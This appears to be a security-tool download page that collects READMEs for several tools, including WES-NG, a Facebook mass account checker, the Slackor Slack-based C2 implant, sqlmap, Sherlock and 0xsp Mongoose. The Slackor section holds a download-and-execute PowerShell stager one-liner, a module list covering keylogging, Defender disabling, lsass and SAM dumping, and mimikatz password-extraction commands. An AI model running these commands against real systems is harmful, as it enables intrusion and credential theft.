WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

Usage

1. Obtain the latest database of vulnerabilities by executing the command wes.py --update.
2. Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt
3. Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities it is currently exposed, including exploits if available.

As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md.

Collector

This GitHub repository regularly updates the database of vulnerabilities, so running wes.py with the --update parameter gets the latest version. If manual generation of the .csv file with hotfix information is required, use the scripts from the /collector folder to compile the database. Read the comments at the top of each script and execute them in the order as they are listed below. Executing these scripts will produce CVEs.csv.

The WES-NG collector pulls information from various sources:

- Microsoft Security Bulletin Data: KBs for older systems [1]
- MSRC: The Microsoft Security Update API of the Microsoft Security Response Center (MSRC): Standard source of information for modern Microsoft Updates [2]
- NIST National Vulnerability Database (NVD): Complements vulnerabilities with Exploit-DB links [3]

These are combined into a single .csv file which is compressed and hosted in this GitHub repository.

Rationale

I developed WES-NG because while GDSSecurity's Windows-Exploit-Suggester worked excellently for operating systems in the Windows XP and Windows Vista era, GDSSecurity's Windows-Exploit-Suggester does not work for operating systems like Windows 10 and vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1], on which GDSSecurity's Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity, for this great tool which has served many of us for so many years!

Bugs

Bugs can be submitted via the Issues page. For false positives in results, please read the Eliminating false positives page at the Wiki first. In case that doesn't significantly reduce the number of false positives, follow the steps at the Report false positives page on the Wiki.

Changelog

See CHANGELOG.md

Improvements

- Add support for NoPowerShell's Get-SystemInfo cmdlet output
- Add support for wmic qfe output together with support for parameters to manually specify the operating system
- Add support for alternative output formats of systeminfo (csv, table)
- More testing on the returned false positive vulnerabilities (see also the wiki)
- Add support for Itanium architecture

References

[1] https://www.microsoft.com/download/details.aspx?id=36982
[2] https://portal.msrc.microsoft.com/en-us/developer
[3] https://nvd.nist.gov/vuln/data-feeds

Authored by Arris Huijgen (@bitsadmin, https://github.com/bitsadmin/)

Download Wesng

Facebook Mass Account Checker

Installation:

apt install git
apt install php
git clone https://github.com/fdciabdul/fbchecker
cd fbchecker
php fbcheck.php

Usage:

php fbcheck.php target.txt

Download Fbchecker

A Golang implant that uses Slack as a command and control channel. This project was inspired by Gcat and Twittor. This tool is released as a proof of concept. Be sure to read and understand the Slack App Developer Policy before creating any Slack apps.

Setup

Note: The server is written in Python 3.

For this to work you need:

- A Slack Workspace
- Register an app with the following permissions: channels:read, channels:history, channels:write, files:write:user, files:read
- Create a bot

This repo contains five files:

- install.sh: Installs dependencies
- setup.py: The script to create the Slack channels, database, and implant
- server.py: The Slackor server, designed to be run on Linux
- template.go: Template for the generated implant
- requirements.txt: Python dependencies (installed automatically)

To get started:

1. Run install.sh
2. Run setup.py
3. Supply the OAuth Access Token and Bot User OAuth Access Token from your app

After running the script successfully, a file agent.exe will be created. It will be a 64-bit Go binary packed with UPX. After starting server.py on a Linux host, execute agent.exe on your target Windows host. Run the "stager" module to generate a one-liner and other droppers.

powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe

This will execute Invoke-WebRequest (PS v3+) to download the payload, execute it using a LOLBin, and then delete itself once killed. This is a working example but the command can be tweaked to use another download method or execution method.

Usage

Type "help" or press [TAB] to see a list of available commands. Type "help [COMMAND]" to see a description of that command.

(Slackor)

- help - Displays help menu
- interact - Interact with an agent
- list - List all registered agents
- remove - Kill and remove an agent
- revive - Sends a signal to all agents to re-register with the server
- stager - Generates a one-liner to download and execute the implant
- quit - Quit the program
- wipefiles - Deletes all uploaded files out of Slack

Once an agent checks in, you can interact with it. Use "interact [AGENT]" to enter into an agent prompt. Type "help" or press [TAB] to see a list of available commands.

(Slackor:AGENT)

- back - Return to the main menu
- beacon - Change the amount of time between each check-in by an agent (default is 5 seconds)
- bypassuac - Attempts to spawn a high integrity agent
- cleanup - Removes persistence artifacts
- clipboard - Retrieves the contents of the clipboard
- defanger - Attempts to de-fang Windows Defender
- download - Download a file from the agent to the Slackor server
- duplicate - Causes the agent to spawn another invocation of itself
- getsystem - Spawns an agent as NT AUTHORITY/SYSTEM
- help - Displays help menu
- keyscan - Starts a keylogger on the agent
- kill - Kill the agent
- minidump - Dumps memory from lsass.exe and downloads it
- persist - Creates persistence by implanting a binary in an ADS
- samdump - Attempts to dump the SAM file for offline hash extraction
- screenshot - Takes a screenshot of the desktop and retrieves it
- shellcode - Executes x64 raw shellcode
- sleep - Cause the agent to sleep once (enter time in seconds)
- sysinfo - Displays the current user, OS version, system architecture, and number of CPU cores
- upload - Upload a file to the agent from the Slackor server
- wget - Pull down arbitrary files over HTTP/HTTPS

OPSEC Considerations

Command output and downloaded files are AES encrypted in addition to TLS transport encryption. Modules will warn you before performing tasks that write to disk. When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host.

Here are several OPSEC safe commands that will NOT execute cmd.exe:

- cat - Prints file content
- cd - Change directory
- hostname - Displays the name of the host
- ifconfig - Displays interface information
- ls - List directory contents
- mkdir - Creates a directory
- pwd - Prints the current working directory
- rm - Removes a file
- rmdir - Removes a directory
- whoami / getuid - Prints the current user

Credits

- https://github.com/EgeBalci - Functions adapted from HERCULES and EGESPLOIT
- https://github.com/SaturnsVoid - Keylogger adapted from GoBot2
- https://github.com/vyrus001 - x64 shellcode execution shellGo
- Crypto functions adopted from https://www.golang123.com/topic/1686
- Persistence idea from Enigma0x3
- Minidump adopted from Merlin, credit to C-Sto
- Screenshot code from kbinani
- Clipboard code from atotto
- Stager generator from hlldz
- UAC bypass by winscripting.blog
- Lulzbin find by @vector_sec
- Countless threads on StackOverflow
- Thanks to impacket for dumping hashes from SAM/SYS/SECURITY reg hives.
- LSASS dump credential extraction made possible using pypykatz by skelsec

Future goals

- DOSfuscation
- Reflectively load DLL/PE - https://github.com/vyrus001/go-mimikatz
- Execute C# assemblies in memory - https://github.com/lesnuages/go-execute-assembly
- Source code obfuscation - https://github.com/unixpickle/gobfuscate

FAQ

Is this safe to use for red teams/pentesting?

Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could reverse engineer it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations.

What about Mimikatz?

The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following:

(Slackor: AGENT) minidump

This will automatically extract passwords with Pypykatz. Alternatively, you can use Mimikatz on Windows.

> mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords

Is it cross-platform?

Not yet. It has not been fully tested on a variety of systems. The server was designed to run on Kali Linux and the agent on Windows 10.

How well does it scale?

Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use.

Is it vulnerable to standard beacon analysis?

Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are received.

Why did you do [x] when a better way to do it is [y]?

I tried my best. PRs are encouraged :)

It gets caught by AV!

The built-in HTA stager is created by SpookFlare, which is based on Demiguise. If you want your droppers to not get snagged you probably want to go custom. The built-in droppers are just there to get you started.

Download Slackor

Software to identify the different types of hashes used to encrypt data and especially passwords.

Encryption formats supported:

- ADLER-32
- CRC-32
- CRC-32B
- CRC-16
- CRC-16-CCITT
- DES(Unix)
- FCS-16
- GHash-32-3
- GHash-32-5
- GOST R 34.11-94
- Haval-160
- Haval-192 110080
- Haval-224 114080
- Haval-256
- Lineage II C4
- Domain Cached Credentials
- XOR-32
- MD5(Half)
- MD5(Middle)
- MySQL
- MD5(phpBB3)
- MD5(Unix)
- MD5(WordPress)
- MD5(APR)
- Haval-128
- MD2
- MD4
- MD5
- MD5(HMAC(WordPress))
- NTLM
- RAdmin v2.x
- RipeMD-128
- SNEFRU-128
- Tiger-128
- MySQL5 - SHA-1(SHA-1($pass))
- MySQL 160bit - SHA-1(SHA-1($pass))
- RipeMD-160
- SHA-1
- SHA-1(MaNGOS)
- Tiger-160
- Tiger-192
- md5($pass.$salt) - Joomla
- SHA-1(Django)
- SHA-224
- RipeMD-256
- SNEFRU-256
- md5($pass.$salt) - Joomla
- SAM - (LM_hash:NT_hash)
- SHA-256(Django)
- RipeMD-320
- SHA-384
- SHA-256
- SHA-384(Django)
- SHA-512
- Whirlpool
- And more...

Some of these formats cannot be told apart from one another unless the hash has been cracked, so the usefulness of the software's output also depends on the user's own judgement.

Download Hash-Identifier

MIG is Mozilla's platform for investigative surgery of remote endpoints.

Quick Start w/ Docker

You can spin up a local-only MIG setup using docker. The container is not suitable for production use but lets you experiment with MIG quickly, providing a single container environment that has most of the MIG components available.

To pull from Docker Hub:

$ docker pull mozilla/mig
$ docker run -it mozilla/mig

Or, if you have the source checked out in your GOPATH you can build your own image:

$ cd $GOPATH/src/github.com/mozilla/mig
$ docker build -t mozilla/mig:latest .
$ docker run -it mozilla/mig

Once inside the container, you can use the MIG tools to query a local agent, as such:

$ /go/bin/mig file -t all -path /usr/bin -sha2 5c1956eba492b2c3fffd8d3e43324b5c477c22727385be226119f7ffc24aad3f
1 agents will be targeted. ctrl+c to cancel. launching in 5 4 3 2 1 GO
Following action ID 7978299359234.
1 / 1 [=========================================================] 100.00% 0/s4s
100.0% done in 3.029105958s
1 sent, 1 done, 1 succeeded
ed11f485244a /usr/bin/wget [lastmodified:2016-07-05 15:32:42 +0000 UTC, mode:-rwxr-xr-x, size:419080] in search 's1'
1 agent has found results

To explore the capabilities of MIG, take a look at the CheatSheet.

What is this?

MIG is composed of agents installed on all systems of an infrastructure that can be queried in real-time to investigate the file-systems, network state, memory or configuration of endpoints.

Capability         | Linux     | MacOS     | Windows
-------------------|-----------|-----------|----------
file inspection    | yes       | yes       | yes
network inspection | yes       | yes       | (partial)
memory inspection  | yes       | yes       | yes
vuln management    | yes       | (planned) | (planned)
log analysis       | (planned) | (planned) | (planned)
system auditing    | yes       | (planned) | (planned)

Imagine it is 7am on a Saturday morning, and someone just released a critical vulnerability for your favorite PHP application. The vuln is already exploited and security groups are releasing indicators of compromise (IOCs). Your weekend isn't starting great, and the thought of manually inspecting thousands of systems isn't making it any better.

MIG can help. The signature of the vulnerable PHP app (the md5 of a file, a regex, or just a filename) can be searched for across all your systems using the file module. Similarly, IOCs such as specific log entries, backdoor files with md5 and sha1/2/3 hashes, IP addresses from botnets or byte strings in process memory can be investigated using MIG. Suddenly, your weekend is looking a lot better. And with just a few commands, thousands of systems will be remotely investigated to verify that you're not at risk.

MIG agents are designed to be lightweight, secure, and easy to deploy so you can ask your favorite sysadmins to add it to a base deployment without fear of breaking the entire production network. All parameters are built into the agent at compile time, including the list and ACLs of authorized investigators. Security is enforced using PGP keys, and even if MIG's servers are compromised, as long as your keys are safe on your investigator's laptop, no one will break into the agents.

MIG is designed to be fast and asynchronous. It uses AMQP to distribute actions to endpoints, and relies on Go channels to prevent components from blocking. Running actions and commands are stored in a PostgreSQL database and on a disk cache, such that the reliability of the platform doesn't depend on long-running processes.

Speed is a strong requirement. Most actions will only take a few hundred milliseconds to run on agents. Larger ones, for example when looking for a hash in a big directory, should run in less than a minute or two. All in all, an investigation usually completes in between 10 and 300 seconds.

Privacy and security are paramount. Agents never send raw data back to the platform, but only reply to questions instead. All actions are signed by GPG keys that are not stored in the platform, thus preventing a compromise from taking over the entire infrastructure.

Technology

MIG is built in Go and uses a REST API that receives signed JSON messages distributed to agents via RabbitMQ and stored in a Postgres database. It is:

- Massively Distributed, which means Fast.
- Simple to deploy and Cross-Platform.
- Secured using OpenPGP.
- Respectful of privacy by never retrieving raw data from endpoints.

Check out this 10 minute video for a more general presentation and a demo of the console interface. MIG was recently presented at the SANS DFIR Summit in Austin, Tx; a recording of that talk is available.

Discussion

Join #mig on irc.mozilla.org (use a web client such as mibbit).

Documentation

All documentation is available in the 'doc' directory and on http://mig.mozilla.org.

- Concepts & Internal Components
- Installation & Configuration

Download Mig

Icebox is a Virtual Machine Introspection solution that enables you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.

Files which might be helpful:

- INSTALL.md: how to install icebox.
- BUILD.md: how to build icebox.

Demo

Project Organisation

- fdp: Fast Debugging Protocol sources
- icebox: Icebox sources
  - icebox: Icebox lib (core, os helpers, plugins...)
  - icebox_cmd: Program that tests several features
  - samples: Bunch of examples
- winbagility: stub to connect WinDBG to FDP
- virtualbox: VirtualBox sources patched for FDP.

Getting Started

Some samples have been written in the samples folder. You can build them with these instructions after you have installed the requirements. If you're using a Windows guest you might want to set the environment variable _NT_SYMBOL_PATH to a folder that contains your guest's pdb. Please note that icebox setup will fail if it does not find your guest's kernel's pdb.

vm_resume: vm_resume just pauses then resumes your VM.

cd icebox/bin/$ARCH/
./vm_resume

nt_writefile: nt_writefile breaks when a process calls ntdll!NtWriteFile, and dumps what's written into a file on your host in the current directory.

cd icebox/bin/$ARCH/
./nt_writefile

heapsan: heapsan breaks on ntdll memory allocations from a process and adds padding before & after every pointer. It is still incomplete and doesn't do any checks yet.

cd icebox/bin/$ARCH/
./heapsan

wireshark: wireshark breaks when the ndis driver reads or sends network packets and creates a wireshark trace (.pcapng). Each packet sent is associated with a callstack from kernel land to userland if necessary.

cd icebox/bin/$ARCH/
./wireshark

Download Icebox

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
- Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here. Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Demo

Links

- Homepage: http://sqlmap.org
- Download: .tar.gz or .zip
- Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
- User's manual: https://github.com/sqlmapproject/sqlmap/wiki
- Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
- Twitter: @sqlmap
- Demos: http://www.youtube.com/user/inquisb/videos
- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

Translations

Bulgarian, Chinese, Croatian, French, Greek, Indonesian, Italian, Japanese, Portuguese, Spanish, Turkish

Download SQLMap v1.3.7

Find usernames across social networks

Installation

NOTE: Python 3.6 or higher is required.

# clone the repo
$ git clone https://github.com/sherlock-project/sherlock.git

# change the working directory to sherlock
$ cd sherlock

# install python3 and python3-pip if not exist

# install the requirements
$ pip3 install -r requirements.txt

Usage

$ python3 sherlock.py --help
usage: sherlock.py [-h] [--version] [--verbose] [--rank]
                   [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor]
                   [--unique-tor] [--csv] [--site SITE_NAME]
                   [--proxy PROXY_URL] [--json JSON_FILE]
                   USERNAMES [USERNAMES ...]

Sherlock: Find Usernames Across Social Networks (Version 0.6.4)

positional arguments:
  USERNAMES             One or more usernames to check with social networks.

optional arguments:
  -h, --help            show this help message and exit
  --version             Display version information and dependencies.
  --verbose, -v, -d, --debug
                        Display extra debugging information and metrics.
  --rank, -r            Present websites ordered by their Alexa.com global rank in popularity.
  --folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT
                        If using multiple usernames, the output of the results will be saved at this folder.
  --output OUTPUT, -o OUTPUT
                        If using single username, the output of the result will be saved at this file.
  --tor, -t             Make requests over TOR; increases runtime; requires TOR to be installed and in system path.
  --unique-tor, -u      Make requests over TOR with new TOR circuit after each request; increases runtime; requires TOR to be installed and in system path.
  --csv                 Create Comma-Separated Values (CSV) File.
  --site SITE_NAME      Limit analysis to just the listed sites. Add multiple options to specify more than one site.
  --proxy PROXY_URL, -p PROXY_URL
                        Make requests over a proxy. e.g. socks5://127.0.0.1:1080
  --json JSON_FILE, -j JSON_FILE
                        Load data from a JSON file or an online, valid, JSON file.
  --print-found         Prints only found messages. Errors, and invalid username errors will not appear.

For example, run python3 sherlock.py user123, and all of the accounts found will be stored in a text file with the username (e.g. user123.txt).

Docker Notes

If you have docker installed you can build an image and run this as a container.

docker build -t mysherlock-image .

Once the image is built sherlock can be invoked by running the following:

docker run --rm mysherlock-image user123

The optional --rm flag removes the container filesystem on completion to prevent cruft build-up. See https://docs.docker.com/engine/reference/run/#clean-up---rm

One caveat is the text file that is created will only exist in the container, so you will not be able to get at that.

Or you can simply use "Docker Hub" to run sherlock:

docker run theyahya/sherlock user123

Adding New Sites

Please look at the Wiki entry on adding new sites to understand the issues.

Tests

If you are contributing to Sherlock, then Thank You!

Before creating a pull request with new development, please run the tests to ensure that all is well. It would also be a good idea to run the tests before starting development to distinguish problems between your environment and the Sherlock software.

The following is an example of the command line to run all the tests for Sherlock. This invocation hides the progress text that Sherlock normally outputs, and instead shows the verbose output of the tests.

$ python3 -m unittest tests.all --buffer --verbose

Note that we do currently have 100% test coverage. Unfortunately, some of the sites that Sherlock checks are not always reliable, so it is not uncommon to get response errors.

Download Sherlock

Using 0xsp mongoose you will be able to scan a targeted operating system for any possible way for privilege escalation attacks, from the information collecting stage through to reporting the information via the 0xsp Web Application API. The user is able to scan different Linux systems at the same time with high performance, without spending time looking through the terminal or a text file for what was found; mongoose shortens this by allowing you to send this information directly into a friendly web application interface through an easy API endpoint.

The project is divided into two sections: server & agent. The server has been coded in PHP (CodeIgniter); you need to install this application into your preferred environment, and you can use it online or on your localhost. The user is free to choose. Contributions to enhance features are most welcome.

The agent is an ELF binary coded with Lazarus Free Pascal and will be released in 32-bit and 64-bit builds. When executing the agent on the targeted system with all required parameters, the user is free to decide whether to communicate with the Server App to store results and explore them easily, or to run this tool without the Web API connection.

Agent Usage

Make sure to give it executable permission:

chmod +x agent
./agent -h (display help instructions)

- -k: Check kernel for commonly used privilege escalation exploits.
- -u: Get information about users, groups and related information.
- -c: Check cronjobs.
- -n: Retrieve network information, interfaces, etc.
- -w: Enumerate writeable files, dirs, SUID.
- -i: Search for Bash, Python, MySQL, Vim, etc. history files.
- -f: Search for sensitive config files accessible & private stuff.
- -o: Connect to 0xsp Web Application.
- -p: Show all processes running under root; check for vulnerable packages.
- -e: Kernel inspection tool; it will help to search through the tool's databases for kernel vulnerabilities.
- -x: Secret key to authorize your connection with the WebApp API (default is 0xsp).
- -a: Display README.

Server Web App (must be like this: http://host/0xsp/)

Make sure to have at least PHP 5.6 or above; requires MySQL 5.6. Make sure to add the web application on the root path / with folder name 0xsp, as in http://localhost/0xsp/. The agent will not connect to it if it is not configured correctly. The agent will connect only in the following case:

./agent {SCAN OPTION} -o localhost -x secretkey

Examples With WebApi

./agent -c -o localhost -x 0xsp { enumerate CRON tasks and transfer results into the Web API }
./agent -e -o localhost -x 0xsp { intelligent exploits detector }
./agent -c -e -o localhost -x 0xsp { will run two scans together and send found results directly }
./agent -m -o 10.10.13.1 -x 0xsp { run all scans together and export to the Web API }

Examples Without WebApi

./agent -c -k -p { this will run 3 scans at the same time without sending results into the Web API }

Agent Features

- High performance, stability; output results are generated while executing, with no delays
- Ability to execute most functions with intelligent techniques
- Results are sent to a quick Web API
- Exception handling
- Inbuilt JSON data set for publicly disclosed exploits
- Fast as a Mongoose

Download 0xsp-Mongoose

lst2x64dbg

This script extracts all the labels found in the LST file that is given as the script's single argument. An x64dbg database is created in the current directory based on the extracted labels.

The LST file can be generated in IDA from the File menu: Produce file -> Create LST file...

Example

$ python3 lst2x64dbg.py sample.lst

ghidra2x64dbg

This script extracts all the labels found in the CSV file that is given as the script's single argument. An x64dbg database is created in the current directory based on the extracted labels. The imagebase value must be supplied.

The CSV file can be generated in Ghidra from the Window menu by selecting Symbol Table. In the symbol table window that opens, sort the data by the Location column. Then select all symbols that are not external locations. With the desired symbols selected, right click and select: Export -> Export to CSV... Name this file .csv

Example

$ python3 ghidra2x64dbg.py -i 400000 sample.csv

The imagebase value can be found at the very top of the disassembly panel in the CodeBrowser window. It's part of the DOS header.

ToDo

- Convert to package with console script

Download Lst2X64Dbg